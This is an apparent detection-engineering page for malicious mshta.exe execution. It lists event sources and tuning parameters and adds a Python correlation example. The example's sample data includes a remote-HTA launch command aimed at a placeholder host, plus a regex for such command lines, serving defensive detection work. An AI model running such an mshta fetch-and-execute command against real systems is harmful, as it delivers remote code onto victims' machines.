Detects mshta.exe execution whose command-line arguments reference remote or local HTA or script content (VBScript/JScript), followed by file creation, network retrieval, or process spawning that indicates the payload ran outside the standard Internet Explorer security context. Correlation combines parent-process lineage, command-line inspection, and creation of network connections to untrusted or anomalous endpoints.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Security | EventCode=4688 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| File Creation (DC0039) | WinEventLog:Sysmon | EventCode=11 |

| Field | Description |
|---|---|
| CommandLinePattern | Regex patterns for mshta.exe arguments referencing remote HTA/script content; may need tuning to exclude known-good internal scripts. |
| SuspiciousParentProcesses | List of parent processes considered suspicious when spawning mshta.exe (e.g., Office applications, script interpreters). |
| AllowedHTASources | Whitelist of domains/paths from which legitimate HTAs are executed. |
| TimeWindow | Time threshold for correlating mshta.exe execution with subsequent network connections or file creations. |
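A worked correlation of the strategy above, added here as an example and not part of the original page or of any vendor's detection content: it assumes the three event sources (4688, Sysmon 3, Sysmon 11) have already been normalized into dicts keyed by PID, and every field name, hostname and parameter value below is constructed.

```python
import re
# Tunable parameters from the table above; every value here is constructed for the example.
COMMAND_LINE_PATTERN = re.compile(r"https?://|\\\\\S+\\|\.hta\b|vbscript:|javascript:", re.I)
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe", "cscript.exe"}
ALLOWED_HTA_SOURCES = {"intranet.example.local"}
TIME_WINDOW = 60  # seconds between mshta.exe start and follow-on network/file activity

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def mshta_candidates(events):
    """4688 rows for mshta.exe whose arguments reference HTA/script content from a non-allowlisted source."""
    out = []
    for e in events:
        if (e["type"] != "process" or basename(e["image"]) != "mshta.exe"
                or not COMMAND_LINE_PATTERN.search(e["cmdline"])):
            continue
        hosts = {h.lower() for h in re.findall(r"(?:https?://|\\\\)([^/\\\s:]+)", e["cmdline"], re.I)}
        if hosts and hosts <= ALLOWED_HTA_SOURCES:
            continue  # every URL/UNC host named on the command line is allowlisted
        out.append(e)
    return out

def correlate(events):
    """Alert only when the candidate's PID shows network (Sysmon 3) or file (Sysmon 11) activity in TIME_WINDOW."""
    alerts = []
    for p in mshta_candidates(events):
        follow = [e for e in events if e["type"] in ("network", "file")
                  and e["pid"] == p["pid"] and 0 <= e["time"] - p["time"] <= TIME_WINDOW]
        if not follow:
            continue  # a matching command line alone is weak evidence; require the follow-on activity
        alerts.append({"pid": p["pid"], "cmdline": p["cmdline"],
                       "suspicious_parent": basename(p["parent_image"]) in SUSPICIOUS_PARENTS,
                       "network": [e["dest"] for e in follow if e["type"] == "network"],
                       "files": [e["target"] for e in follow if e["type"] == "file"]})
    return alerts

# Constructed, normalized telemetry: 4688 (process), Sysmon 3 (network), Sysmon 11 (file).
SAMPLE_EVENTS = [
    {"type": "process", "time": 0, "pid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": r"mshta.exe http://cdn.example.invalid/update.hta"},
    {"type": "network", "time": 2, "pid": 4120, "dest": "cdn.example.invalid:80"},
    {"type": "file", "time": 5, "pid": 4120, "target": r"C:\Users\u\AppData\Local\Temp\upd.exe"},
    {"type": "process", "time": 100, "pid": 5300, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": r"mshta.exe \\intranet.example.local\it\help.hta"},
    {"type": "process", "time": 200, "pid": 6000, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": r"mshta.exe C:\Users\u\Downloads\invoice.hta"},
    {"type": "file", "time": 500, "pid": 6000, "target": r"C:\Users\u\x.txt"},  # outside TIME_WINDOW
]
```

Of the three mshta.exe starts, only PID 4120 alerts: 5300 is skipped by the allowlist and 6000 has no follow-on activity inside the window. Correlating on PID alone is an assumption that holds within a short window; production logic should also key on host and process start time to survive PID reuse.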